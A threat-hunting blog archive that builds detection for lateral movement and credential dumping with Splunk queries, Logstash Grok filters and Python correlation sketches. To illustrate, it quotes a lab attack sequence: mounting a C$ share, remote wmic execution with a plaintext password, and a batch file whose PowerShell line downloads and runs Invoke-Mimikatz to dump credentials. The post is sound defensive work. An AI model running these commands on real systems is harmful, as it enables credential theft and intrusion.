DFIR and Threat Hunting: December 2017

Earlier this year I talked a lot about behavior chains and how someone would go about implementing these in Splunk. In my last post I also talked about a need to know the capabilities of your tools so that you can take full advantage of them. I wanted to do something a little different with this post. I know that many of you are using an ELK stack today for hunting or daily ops and it’s one of the areas where I lack experience. I decided to dig into ELK and see if it was possible to surface events of interest and begin to chain them together. In this post I’m going to document what I’ve accomplished so far in the hopes that it may spur some ideas.

Before we begin, here’s an overly simplistic view of how I went about chaining behaviors in Splunk:

Write queries for all actions that an attacker may take (regardless of volume that’s produced).
Schedule queries to run routinely.
Log all results of queries to a separate index.
Query separate index for multiple events by user/src/dest within specified timeframe.
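
The last step above can be sketched in Python, independent of any particular tool. This is only a rough illustration: it assumes each query hit has already been logged as a dict with `time`, `user`, `src`, `dest` and `behavior` keys (names I made up for the example), and the 10 minute window and threshold of 3 behaviors are arbitrary. The host names and behaviors in `sample_hits` are made-up sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def find_chains(hits, window=timedelta(minutes=10), min_behaviors=3):
    """Group query hits by (user, src, dest) and report clusters of distinct behaviors."""
    by_entity = defaultdict(list)
    for hit in hits:
        by_entity[(hit["user"], hit["src"], hit["dest"])].append(hit)

    chains = []
    for entity, entity_hits in by_entity.items():
        entity_hits.sort(key=lambda h: h["time"])
        for i, first in enumerate(entity_hits):
            # Collect every hit that falls inside the window starting at this hit.
            in_window = [h for h in entity_hits[i:] if h["time"] - first["time"] <= window]
            behaviors = {h["behavior"] for h in in_window}
            if len(behaviors) >= min_behaviors:
                chains.append((entity, sorted(behaviors)))
                break  # one report per entity is enough for this sketch
    return chains


# Made-up sample data standing in for the contents of the separate index.
t0 = datetime(2017, 12, 30, 12, 0, 0)
sample_hits = [
    {"time": t0, "user": "admin1", "src": "ws1", "dest": "srv1", "behavior": "mount_share"},
    {"time": t0 + timedelta(minutes=1), "user": "admin1", "src": "ws1", "dest": "srv1", "behavior": "copy_to_share"},
    {"time": t0 + timedelta(minutes=2), "user": "admin1", "src": "ws1", "dest": "srv1", "behavior": "wmic_exec"},
    {"time": t0, "user": "bob", "src": "ws2", "dest": "srv1", "behavior": "mount_share"},
]
```

Calling `find_chains(sample_hits)` reports the admin1/ws1/srv1 cluster and ignores the single unrelated hit. The point is that no single hit needs to be rare on its own; only the cluster does.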

Getting started, I first went about configuring Elasticsearch to consume logs being sent from Winlogbeat. I applied the same log sources from the same virtual machines. Once my logs were flowing I began to experiment with Kibana and the query language. I was able to query for many of the same behaviors that I could in Splunk. The exceptions are those that correlate multiple events by time. Here is an example, written as a Splunk query, of what I would like to accomplish with ELK:

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100180 OR Access_Mask=0x80 OR Access_Mask=0x130197) |bucket span=1s _time |rex "(?<thingtype>(0x100180|0x80|0x130197))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

The above query will try to identify three logs with event ID 5145 whose access masks are 0x100180, 0x80 and 0x130197, all generated within the same second. This would be indicative of a file being copied to a $ share from a command prompt. Unfortunately, after banging my head against a wall for an entire weekend, I have not found a way to do this with Kibana or Elasticsearch.
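
To make the logic of that query concrete, here is a rough Python sketch of the same one second bucketing. It is not a Kibana or Elasticsearch solution. It assumes the events have already been pulled out of the log store as dicts whose keys mirror the Splunk field names above, plus a `time` key holding a `datetime` (my own naming). The sample events are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# The three access masks from the query above.
COPY_TO_SHARE_MASKS = {"0x100180", "0x80", "0x130197"}


def copies_to_dollar_share(events, masks=COPY_TO_SHARE_MASKS):
    """Return (computer, second, targets) where all masks were seen in the same second."""
    buckets = defaultdict(lambda: {"masks": set(), "targets": set()})
    for ev in events:
        if ev.get("EventCode") != 5145 or ev.get("Object_Type") != "File":
            continue
        if not ev.get("Share_Name", "").endswith("$"):
            continue
        if ev.get("Access_Mask") not in masks:
            continue
        # Truncate to the second, the same idea as `bucket span=1s _time`.
        second = ev["time"].replace(microsecond=0)
        bucket = buckets[(ev["ComputerName"], second)]
        bucket["masks"].add(ev["Access_Mask"])
        bucket["targets"].add(ev["Relative_Target_Name"])
    # Equivalent of `dc(thingtype)` equal to 3: every mask must be present.
    return [
        (computer, second, sorted(b["targets"]))
        for (computer, second), b in buckets.items()
        if b["masks"] == set(masks)
    ]


# Made-up sample: three 5145 events for one file inside the same second.
t0 = datetime(2017, 12, 30, 12, 0, 0)
base = {
    "EventCode": 5145,
    "Object_Type": "File",
    "Share_Name": "\\\\*\\C$",
    "ComputerName": "srv1",
    "Relative_Target_Name": "temp\\bad.bat",
}
sample_events = [
    dict(base, Access_Mask=mask, time=t0 + timedelta(milliseconds=100 * i))
    for i, mask in enumerate(["0x100180", "0x80", "0x130197"])
]
```

Running `copies_to_dollar_share(sample_events)` returns one result for srv1. If the same three events are spread over several seconds, nothing is returned.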

Realizing that Kibana and Elasticsearch probably wouldn't get me to where I wanted to be, I decided to see what I could do with Logstash (I was putting this off simply because I didn’t have it installed). My goal was to still be able to group events and start chaining them together. I found that Logstash has a cool feature to help with this: the ability to tag events with unique identifiers. My thought was to use the tagging method as a replacement for the separate index. By tagging events that I’m interested in I can start grouping them by time. I would also have an easy method to dive directly into logs of interest, as they would include a tag that I could pivot on. To begin doing this I first needed to define the things that I’m interested in, so I created a file with the below regular expressions that can be used in Grok filters.

# Event Codes

PROCSTART (\s*(4688)\s*)

EXPLICITLOGIN (\s*(4648)\s*)

FILESHARE (\s*(5145)\s*)

SHAREPATH (\s*(5140)\s*)

# Access masks found in various windows security event logs

ACCESSMASK12019F (\s*(0x12019f)\s*)

ACCESSMASK1 (\s*(0x1)\s*)

# Specific expressions related to lateral movement

SHARENAME (\\\\C\$|\\\\c\$|\\\\ADMIN\$|\\\\admin\$|\\\\IPC\$|\\\\ipc\$)

RELATIVETARGETNAME (srvsvc)

SYSMONCLISHARE ((CommandLine)[:]{1}.*?(c\$|C\$|admin\$|ADMIN\$))

SYSMONCLIIPV4 ((CommandLine)[:]{1}.*?(?<![0-9])(?:(?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5]))(?![0-9]))

# Suspicious Executions

PSWEBREQUEST ((CommandLine)[:]{1}.*?(://))

WMICEXEC ((CommandLine)[:]{1}.*?(wmic|WMIC).*?(?<![0-9])(?:(?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5]))(?![0-9]).*?(process)\s*(call)\s*(create))

Making use of Grok filters, I simply want to match patterns in logs.

input {
  beats {
    port => 5044
    host => "0.0.0.0"
  }
}

# Tag suspicious process starts.
# SUSPICIOUSPROCESSNAME is not among the patterns listed above; it must be defined in patterns_dir.
filter {
  if [type] == "wineventlog" {
    grok {
      patterns_dir => [ "/etc/logstash/patterns" ]
      match => { "message" => "%{SUSPICIOUSPROCESSNAME:SPNAME}" }
      add_tag => ["Correlation_Suspicious_Process_Start"]
    }
  }
}

# Tag share enumeration.
# Note: grok stops at the first successful match by default (break_on_match => true),
# so as written this does not require all four patterns to match.
filter {
  if [type] == "wineventlog" {
    grok {
      patterns_dir => [ "/etc/logstash/patterns" ]
      match => { "event_id" => "%{FILESHARE:ECODE}" }
      match => { "message" => "%{RELATIVETARGETNAME:RTN}" }
      match => { "message" => "%{ACCESSMASK12019F:AM}" }
      match => { "message" => "%{SHARENAME:SHARE}" }
      add_tag => ["Correlation_Share_Enumeration"]
    }
  }
}

# Tag Sysmon command lines that contain an IPv4 address.
filter {
  if [type] == "wineventlog" {
    grok {
      patterns_dir => [ "/etc/logstash/patterns" ]
      match => { "message" => "%{SYSMONCLIIPV4:CLI}" }
      add_tag => ["Correlation_IP_Sysmon_CLI"]
    }
  }
}

# Tag Sysmon command lines that reference a $ share.
filter {
  if [type] == "wineventlog" {
    grok {
      patterns_dir => [ "/etc/logstash/patterns" ]
      match => { "message" => "%{SYSMONCLISHARE:CLISHARE}" }
      add_tag => ["Correlation_Sysmon_Dollar_Share_CLI"]
    }
  }
}

# Tag command lines that contain a URL.
filter {
  if [type] == "wineventlog" {
    grok {
      patterns_dir => [ "/etc/logstash/patterns" ]
      match => { "message" => "%{PSWEBREQUEST:CLIWEB}" }
      add_tag => ["Correlation_HTTP_in_PS_Command"]
    }
  }
}

# Drop housekeeping tags so that only the Correlation_ tags remain.
filter {
  if "beats_input_codec_plain_applied" in [tags] {
    mutate {
      remove_tag => ["beats_input_codec_plain_applied"]
    }
  }
}

filter {
  if "_grokparsefailure" in [tags] {
    mutate {
      remove_tag => ["_grokparsefailure"]
    }
  }
}

output {
  elasticsearch { hosts => ["192.168.56.50:9200"] }
  stdout { codec => rubydebug }
}

When a pattern is found I will then tag the log with Correlation_(meaningful name). I can then focus attention on logs that are tagged with Correlation.
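
If it helps to see the tagging idea outside of Logstash, here is a small Python sketch of the same thing. It is not how Logstash works internally. It just applies two of the patterns above (translated to Python's `re` syntax) to a `message` field and appends the matching Correlation_ tag. The dict layout of the event is an assumption on my part.

```python
import re

# Two of the Grok patterns above, rewritten for Python's re module.
PATTERNS = {
    "Correlation_Sysmon_Dollar_Share_CLI": re.compile(r"CommandLine:.*?(c\$|C\$|admin\$|ADMIN\$)"),
    "Correlation_HTTP_in_PS_Command": re.compile(r"CommandLine:.*?://"),
}


def tag_event(event):
    """Return a copy of the event with a Correlation_ tag added for each matching pattern."""
    message = event.get("message", "")
    tags = list(event.get("tags", []))
    for tag, pattern in PATTERNS.items():
        if pattern.search(message) and tag not in tags:
            tags.append(tag)
    return {**event, "tags": tags}


def correlation_tags(event):
    """Pick out only the tags worth pivoting on."""
    return [t for t in event.get("tags", []) if t.startswith("Correlation_")]
```

An event whose message contains `CommandLine: net use z: \\192.168.56.10\c$ /user:admin1` would come back tagged with Correlation_Sysmon_Dollar_Share_CLI, and anything without a match keeps its tags unchanged.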

Using the commands from my last few blog posts as an example, we can see what the output would look like.

net use z: \\192.168.56.10\c$ /user:admin1
copy bad.bat z:\temp\bad.bat
wmic /node:"192.168.56.10" /user:"pwned.com\admin1" /password:"Th1sisa-Test" process call create "cmd.exe /c c:\temp\bad.bat"
copy z:\bad.temp .\bad.temp

And a little snippet of some logs that were captured by the above filters.

This is all still a work in progress and has not been tested other than in a lab. My main goal for this is to gain some knowledge around other logging solutions and to see whether there are ways that I can improve what I am doing today. My next step is to begin piping this data into neo4j, which I think has a lot of potential for finding unknown relationships in these logs of interest. If you have any thoughts, suggestions or recommendations, I would love to hear them.

In my last post I talked a lot about how I think about finding bad guys. From creating mind maps of the things I should be looking for to the need for moving beyond simple IOC based detection and into more of a dynamic environment where alerts are clusters of events that are linked by time, source / destination / user. I also described a simple scenario of the actions that an attacker could take to dump credentials on a host and how those actions would map across the needs of an adversary. In this post I want to focus less on the thinking aspect and more on the doing.

To recap the scenario from my last post:

Attacker mounts C$ share on a remote machine
Attacker copies malicious batch script to the mapped share
Attacker issues wmic command to execute batch script on remote machine
Batch script executes powershell that will download and execute invoke-mimikatz
File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem.

The above actions taken by the attacker would fall into the maps under the following:

Need	Action
Authentication	Network Logon: Mounting Share
Data Movement	Admin Shares: Copy .bat script
Execution	WMIC: Execute against remote machines
Authentication	Rare Explicit logon
Data Movement	HTTP: Download of tool
Credential	DLL Loading
Execution	Powershell: Command Arguments
Data Movement	Copy: Dump File

The following are the commands that were executed:

net use z: \\192.168.56.10\c$ /user:admin1
copy bad.bat z:\temp\bad.bat
wmic /node:"192.168.56.10" /user:"pwned.com\admin1" /password:"Th1sisa-Test" process call create "cmd.exe /c c:\temp\bad.bat"
copy z:\bad.temp .\bad.temp

Based on the above command sequence, what are some questions that you would ask as a result?

When admins administer remote servers, do they typically use cmd.exe/wmic.exe/powershell.exe to issue commands or do they use some type of remote desktop solution the majority of the time?
When admins administer remote servers do they typically use ip addresses in their commands instead of hostnames?
What is the volume of remote logins from this source machine?
What is the volume of remote logins from this user?
How often has this source machine mounted the C$ share on a remote machine?
How often has this user mounted the C$ share on a remote machine?
How often has the destination machine had the C$ share mounted?
How often is the copy command used to copy batch scripts to the C$ share of a remote machine?
Is it common for an admin to use WMIC to connect to and issue commands on a remote machine?
If the majority of these are common practice in your environment, is this cluster of events common?

Below are the contents of bad.bat and the same question applies. What are some of the things you could key off of in order to possibly build some detection?

@echo off

powershell.exe "IEX (New-Object Net.WebClient).Downloadstring('http://192.168.56.20/web/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" >> c:\bad.temp

How often does powershell initiate a web request?
Have we seen a command like this in the past?
Have we seen the destination web server previously in a powershell command?
How can we tell if Invoke-Mimikatz was executed?

This is good. We have several things that we can go after to begin to build out some behavioral based detection. As we start creating queries for the above, keep in mind that you may need to use multiple log sources. If this is the case do yourself a favor and try to normalize the fields. It’s much easier to pivot and correlate across log sources when the fields are the same.
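
As a rough idea of what normalizing fields can look like, here is a minimal Python sketch. The common names `user`, `src` and `dest` and the alias lists are my own choices for illustration. `Account_Name`, `Source_Network_Address`, `Source_Address`, `ComputerName` and `Target_Server_Name` are field names used in this post, while `User` and `SourceIp` are assumed names for a second log source. Adjust the mapping to whatever your own sources actually emit.

```python
# Map each common field name to the source-specific names it may appear under.
# The first alias that has a usable value wins.
FIELD_ALIASES = {
    "user": ("Account_Name", "User"),
    "src": ("Source_Network_Address", "Source_Address", "SourceIp"),
    "dest": ("Target_Server_Name", "ComputerName"),
}

EMPTY_VALUES = (None, "", "-")


def normalize(event):
    """Return a copy of the event with common user/src/dest fields added."""
    normalized = dict(event)
    for common_name, aliases in FIELD_ALIASES.items():
        for alias in aliases:
            value = event.get(alias)
            if value not in EMPTY_VALUES:
                normalized[common_name] = value
                break
    return normalized
```

Once every event carries the same `user`, `src` and `dest` keys, pivoting across log sources no longer requires remembering what each source calls them.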

The obvious next step in our process would be to start building the queries out, but before we begin with that we need to understand our infrastructure, how these queries may perform and if there will be any impact as a result of scheduling these to run regularly. I have had the displeasure of working on some systems in the past where the query would have taken longer to run than the needed time span in scheduling. If this is the case, is there anything you can do to streamline your searches? Strictly speaking about Splunk, there is a method to create data models from log sourcetypes. The result of this is a dramatic increase of speed when building complex queries that look across large amounts of data. It may be worth investigating the tool you are working with to see if there is a similar option.

Also keep in mind that the above is just one single action that could be taken by an attacker during an intrusion. If these actions were part of an active intrusion there would likely be many more opportunities for detection. The queries that we will be creating are building blocks that can be used to start surfacing behaviors. These building blocks are likely valid for many other behaviors that may be taken during the course of an intrusion. The more building blocks you have the better your visibility into behaviors becomes. The more log sources that are queried and used for building blocks the more context your alerts will have. By clustering these building blocks and identifying the anomalous (actions, src, dest, user) you have a very good chance of spotting what otherwise may have been missed.

For these examples I’m using Windows event logs and Sysmon logs because that is what I have logging in my lab. I know that company logging policies and standards are all over the place or even non existent. Detection and logging tools are different. These examples won’t match what your environment looks like. The trick is to determine what you can detect with the log sources and the tools you have available. Detection and hunting is not easy. Know your tools as well as your data and be creative in how you go about hunting for bad guys. It’s an art!

I know that not everyone who will be reading this is a Splunk user, so I'm including key items that you can look for in your logs, but not the specific queries. If there are enough people asking I may include them in a separate blog post.

4624 Type 3 Logon

As adversaries move around your network they will often use built-in Windows tools, such as “net” commands. These commands will generate a 4624 Type 3 network logon. Attackers will also likely stray from normal logon patterns within your environment. Logon times, users and src/dest combinations may look different. By looking for rare combinations where there is a remote IP address you may be able to reduce some of the noise while still identifying those events that should be investigated.

Log Source: Windows Security Events

EventCode=4624

LogonType=3

Account_Name!=*$

Workstation_Name!=""
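
A minimal Python sketch of the rare combination idea, assuming the events are available as dicts keyed by the field names above (`EventCode` and `LogonType` as integers). `ComputerName` is used here as the destination, which is an assumption, and the `max_count` threshold of 1 is arbitrary.

```python
from collections import Counter


def rare_network_logons(events, max_count=1):
    """Return (account, workstation, destination) combinations seen at most max_count times."""
    combos = Counter()
    for ev in events:
        if ev.get("EventCode") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("Account_Name", "").endswith("$"):
            continue  # skip machine accounts (Account_Name!=*$)
        if not ev.get("Workstation_Name"):
            continue  # skip logons without a workstation name
        combos[(ev["Account_Name"], ev["Workstation_Name"], ev.get("ComputerName", ""))] += 1
    return sorted(combo for combo, count in combos.items() if count <= max_count)
```

What counts as rare depends entirely on the time range you feed in, so treat the threshold as something to tune rather than a fixed value.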

Command line with ip

If you have command line process audit logging within your environment it may be useful to determine how your admins administer remote machines. Do they typically connect to them by IP address or hostname? By knowing what is normal within your network, it is much easier to develop queries that will surface the abnormal.

Log Source: Sysmon

Regex CommandLine="[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"
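
One thing to be aware of is that the simple regex above will also match strings like 999.1.1.1. If that matters, here is a small Python sketch that uses the same regex idea to find candidates and then lets the standard library `ipaddress` module reject anything that is not a valid IPv4 address. The function name is my own.

```python
import ipaddress
import re

# Same idea as the regex above, with guards so we don't start or stop mid-number.
IP_CANDIDATE = re.compile(r"(?<![0-9])[0-9]{1,3}(?:\.[0-9]{1,3}){3}(?![0-9])")


def ips_in_command_line(command_line):
    """Return the valid IPv4 addresses that appear in a command line."""
    found = []
    for candidate in IP_CANDIDATE.findall(command_line):
        try:
            found.append(str(ipaddress.ip_address(candidate)))
        except ValueError:
            continue  # looked like an IP but is not one, e.g. 999.1.1.1
    return found
```

For the `net use` command used throughout this post, `ips_in_command_line` returns the single address 192.168.56.10, and it returns an empty list when a hostname is used instead.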

C$ share identified in command line

Using Windows shares is an easy way for an attacker to move data around, whether it’s tools that have been brought in or data intended for exfiltration. Pay attention to machines and users accessing hidden shares. Is this a rare occurrence for this machine/user or combination of both? Also pay attention to the process responsible for accessing the share and what the action is.

Log Source: Sysmon

CommandLine=*$\\*

HTTP request via powershell

This goes along with knowing your environment. Is it normal for powershell to invoke a web request? If the answer is yes, are the destinations unique? By looking for unique destinations that were the result of powershell invoking a web request you have a high likelihood of spotting a malicious command.

Log Source: Sysmon

CommandLine="*://*"

Process=powershell.exe
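
To look at destinations rather than whole command lines, something like the following Python sketch could be used. It assumes events are dicts with `Image` and `CommandLine` keys (Sysmon style names, which is an assumption about how your data is parsed) and counts the host portion of every URL found in a PowerShell command line.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# A scheme, then ://, then everything up to whitespace, a quote or a parenthesis.
URL_RE = re.compile(r"[a-zA-Z][a-zA-Z0-9+.-]*://[^\s'\"()]+")


def powershell_destinations(events):
    """Count the URL hosts referenced in PowerShell command lines."""
    destinations = Counter()
    for ev in events:
        if not ev.get("Image", "").lower().endswith("powershell.exe"):
            continue
        for url in URL_RE.findall(ev.get("CommandLine", "")):
            host = urlparse(url).hostname
            if host:
                destinations[host] += 1
    return destinations
```

Sorting the result by count and starting from the least common hosts is one way to get at the unique destinations described above.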

Data movement dest to source

This is similar to the $ share behavior. Whether it’s tools that have been brought in or data intended for exfiltration, pay attention to machines and users accessing hidden shares and the data that is passed between them. Is this a rare occurrence for this machine/user or combination of both?

Log Source: Windows Security Events

Object_Type=File

Share_Name=*$

EventCode=5145

(Access_Mask=0x100081

Access_Mask=0x80

Access_Mask=0x120089) within 1 second

Data movement source to dest

Log Source: Windows Security Events

EventCode=5145

Object_Type=File

Share_Name=*$

(Access_Mask=0x100180

Access_Mask=0x80

Access_Mask=0x130197) within 1 second

Remote WMIC

Execution is an attacker need. We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine. Pay attention to source/dest/user combinations and the processes that are spawned on the remote machine. This query is intended to identify the processes that are spawned within 1 second of wmiprvse executing on the destination side of the wmic command. This query will also attempt to identify the source of the wmic connection.

Log Source: Windows Security Events

EventCode=4688

Process=wmiprvse.exe

Sub Search

EventCode=4624

LogonType=3

Source_Network_Address!=""

Display source address and all processes spawned in that 1 second span.
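
Here is a rough Python sketch of that correlation, again outside of any specific tool. It assumes all events are dicts with a `time` key (a `datetime`), `ComputerName`, and the field names listed above, and it treats "within 1 second" as one second either side of the wmiprvse.exe start. Those are my assumptions, and the sample events are made up.

```python
from datetime import datetime, timedelta


def remote_wmic_activity(events, span=timedelta(seconds=1)):
    """For each wmiprvse.exe start, list nearby network logon sources and spawned processes."""
    results = []
    for anchor in events:
        if anchor.get("EventCode") != 4688:
            continue
        if not anchor.get("Process", "").lower().endswith("wmiprvse.exe"):
            continue
        host, start = anchor["ComputerName"], anchor["time"]
        # Everything on the same host within the time span of the anchor event.
        nearby = [
            ev for ev in events
            if ev.get("ComputerName") == host and abs(ev["time"] - start) <= span
        ]
        sources = sorted({
            ev["Source_Network_Address"] for ev in nearby
            if ev.get("EventCode") == 4624 and ev.get("LogonType") == 3
            and ev.get("Source_Network_Address") not in (None, "", "-")
        })
        spawned = sorted({
            ev["Process"] for ev in nearby
            if ev.get("EventCode") == 4688 and ev is not anchor
        })
        results.append({"host": host, "time": start, "sources": sources, "spawned": spawned})
    return results


# Made-up sample events on a destination host named srv1.
t0 = datetime(2017, 12, 30, 12, 0, 0)
sample_events = [
    {"EventCode": 4624, "LogonType": 3, "Source_Network_Address": "192.168.56.5", "ComputerName": "srv1", "time": t0},
    {"EventCode": 4688, "Process": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ComputerName": "srv1", "time": t0},
    {"EventCode": 4688, "Process": "C:\\Windows\\System32\\cmd.exe", "ComputerName": "srv1", "time": t0 + timedelta(milliseconds=400)},
    {"EventCode": 4688, "Process": "C:\\Windows\\System32\\notepad.exe", "ComputerName": "srv1", "time": t0 + timedelta(seconds=30)},
]
```

With the sample data, the result shows 192.168.56.5 as the source and cmd.exe as the only process spawned in the window. The notepad.exe start 30 seconds later is left out.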

WMIC 4648 login

Execution is an attacker need. We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine. By monitoring explicit logons you can identify users, machines and processes that were used which resulted in an authentication to a remote machine. This query watches for processes that may often be used during lateral movement.

Log Source: Windows Security Events

EventCode=4648

(Process_Name=net.exe

Process_Name=wmic.exe

Process_Name=powershell.exe)

Account_Name!="-"

Target_Server_Name!=localhost

Target_Server_Name!=*$

Process spawned from cmd.exe

Cmd.exe is probably the most executed process by an attacker during KC7. Monitor child processes and identify those clusters that may be related to malicious execution.

Log Source: Sysmon

ParentCommandLine=*cmd*

Mounting remote $ share

Log Source: Windows Security Events

EventCode=5140

Share_Name=*$

Access_Mask=0x1

Account_Name!=*$

Possible credential dumper execution

Attackers need credentials if they are going to move laterally. Identifying the potential execution of a credential dumper is important, as these tools can often be missed by AV. This query looks at the DLLs loaded by each process and identifies processes that load clusters of DLLs often used together by various credential dumping tools.

Log Source: Sysmon

(ImageLoaded=wdigest.dll

ImageLoaded=kerberos.dll

ImageLoaded=tspkg.dll

ImageLoaded=sspicli.dll

ImageLoaded=samsrv.dll

ImageLoaded=secur32.dll

ImageLoaded=samlib.dll

ImageLoaded=wlanapi.dll

ImageLoaded=vaultcli.dll

ImageLoaded=crypt32.dll

ImageLoaded=cryptdll.dll

ImageLoaded=netapi.dll

ImageLoaded=netlogon.dll

ImageLoaded=msv1_0.dll) > 2 by process
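
The "> 2 by process" logic can be sketched in Python like this. It assumes Sysmon image load events are available as dicts with `ComputerName`, `ProcessId`, `Image` and `ImageLoaded` keys, which is an assumption about how your data is parsed. The DLL list is the one above.

```python
from collections import defaultdict

# The DLLs listed above, lowercased for comparison.
CREDENTIAL_DLLS = {
    "wdigest.dll", "kerberos.dll", "tspkg.dll", "sspicli.dll", "samsrv.dll",
    "secur32.dll", "samlib.dll", "wlanapi.dll", "vaultcli.dll", "crypt32.dll",
    "cryptdll.dll", "netapi.dll", "netlogon.dll", "msv1_0.dll",
}


def possible_credential_dumpers(image_load_events, threshold=2):
    """Return processes that loaded more than `threshold` distinct DLLs from the list."""
    loaded = defaultdict(set)
    for ev in image_load_events:
        # Keep only the file name so full paths and bare names compare equally.
        dll = ev["ImageLoaded"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if dll in CREDENTIAL_DLLS:
            loaded[(ev["ComputerName"], ev["ProcessId"], ev["Image"])].add(dll)
    return {proc: sorted(dlls) for proc, dlls in loaded.items() if len(dlls) > threshold}
```

Plenty of legitimate processes load some of these DLLs, so the output is a starting point for stacking by process name rather than an alert on its own.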

Our next step would be to begin correlating the results of these queries. Unfortunately, with a Splunk free license, the ability to generate alerts will expire after 30 days. The alerts are needed in order to log the output of your queries to a separate index from which we would be doing our correlation. I have previously blogged about using queries such as the above and building correlation around them. This post can be found here: http://findingbad.blogspot.com/2017/02/hunting-for-chains.html.

The above queries are the building blocks that will be used as part of a more dynamic behavioral based detection methodology. As you continue to build out and correlate queries based on the actions that adversaries take, your capability to find previously undetected TTPs increases.

I wasn't able to include screenshots of each query as the post, I believe, exceeded the maximum size. I am including a couple screenshots of the results of the queries though. If these queries were correlated into a single alert it should paint a pretty good picture that this is very bad.


Saturday, December 30, 2017

Hunting with ELK

Friday, December 8, 2017

A Few of My Favorite Things - Continued